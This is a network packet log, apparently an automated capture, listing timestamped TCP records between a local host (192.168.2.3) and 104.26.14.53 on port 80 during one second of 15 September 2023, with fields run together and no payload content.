                                                                                                                                                                              Sep 15, 2023 07:26:07.192028046 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.192080021 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.192118883 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.192177057 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.192188025 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.192245007 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.192697048 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.192739010 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.192836046 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.192859888 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.192886114 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.192924023 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.192940950 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.192961931 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.192972898 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.192998886 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.193011045 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.193036079 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.193046093 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.193084955 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.193625927 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.193681002 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.193758965 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.193783998 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.193840027 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.193950891 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.193953991 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.194026947 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.194027901 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.194080114 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.194098949 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.194149971 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.194197893 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.194303036 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.194709063 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.194792986 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.194829941 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.194869041 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.194869041 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.194890022 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.194911003 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.194936037 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.195031881 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.195122004 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.195172071 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.195202112 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.195231915 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.195458889 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.195573092 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.195597887 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.195642948 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.195765972 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.195888042 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.195909023 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.195925951 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.195939064 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.195975065 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.196130991 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.196168900 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.196283102 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.196305990 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.196330070 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.196381092 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.196399927 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.196438074 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.196451902 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.196489096 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.196620941 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.196698904 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.196768999 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.196790934 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.196804047 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.196856022 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.196873903 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.196927071 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.197338104 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.197472095 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.197484970 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.197510004 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.197521925 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.197546959 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.197557926 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.197599888 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.197671890 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.197760105 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.197770119 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.197828054 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.197876930 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.197926998 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.198187113 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.198225021 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.198308945 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.198345900 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.198370934 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.198385000 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.198398113 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.198429108 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.198443890 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.198468924 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.198483944 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.198517084 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.199074984 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.199150085 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.199187994 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.199219942 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.199245930 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.199270010 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.199307919 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.199318886 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.199347019 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.199358940 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.199397087 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.199480057 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.199561119 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.200164080 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.200295925 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.200306892 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.200334072 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.200345993 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.200387001 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.200438976 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.200551987 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.200565100 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.200603962 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.200620890 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.200709105 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.200783014 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.201044083 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.201239109 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.201301098 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.201385021 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.201421022 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.201431990 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.201486111 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.201565981 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.201644897 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.201674938 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.201730013 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.201745987 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.201796055 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.201872110 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.201955080 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.202002048 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.202059984 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.202074051 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.202116966 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.202130079 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.202156067 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.202178001 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.202208996 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.202223063 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.202260971 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.202276945 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.202310085 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.202362061 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.202475071 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.202914953 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.202971935 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.202991962 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.203052044 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.203062057 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.203078985 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.203116894 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.203145027 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.203191996 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.203217983 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.203265905 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.203278065 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.203325033 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.203880072 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.203988075 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.204018116 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.204045057 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.204121113 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.204175949 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.204205036 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.204222918 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.204227924 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.204247952 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.204279900 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.204304934 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.204365969 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.204416037 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.204828024 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.204891920 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.204943895 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.204982996 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.205008030 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.205229998 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.205286980 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.205346107 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.205372095 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.205414057 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.205440998 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.205493927 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.205737114 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.205799103 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.205873013 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.205899000 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.206002951 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.206058979 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.206166029 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.206274033 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.206319094 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.206341982 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.206360102 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.206372976 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.206398964 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.206423044 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.206726074 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.206835032 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.206862926 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.206887960 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.206892014 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.206932068 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.206942081 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.206976891 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.206984997 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.207032919 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.207056999 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.207076073 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.207103014 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.207129002 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.207130909 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.207180023 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.207670927 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.207712889 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.207772970 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.207808971 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.207817078 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.207834959 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.207849979 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.207873106 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.207910061 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.207911015 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.207957029 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.208219051 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.208348036 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.208652020 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.208671093 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.208744049 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.208789110 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.208791018 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.208811998 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.208849907 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.208851099 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.208897114 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.208936930 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.208986044 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.208990097 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.209033966 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.209520102 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.209604025 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.209655046 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.209685087 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.209686041 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.209728956 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.209770918 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.209836006 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.209870100 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.209881067 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.209896088 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.209935904 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.209959984 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.210010052 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.210454941 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.210582018 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.210618019 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.210642099 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.210684061 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.210728884 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.210747004 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.210792065 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.210858107 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.210927010 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.210937977 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.210983992 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.211010933 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.211057901 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.211401939 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.211421013 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.211538076 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.211551905 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.211556911 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.211597919 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.211643934 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.211709976 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.211755037 CEST4972480192.168.2.3104.26.14.53
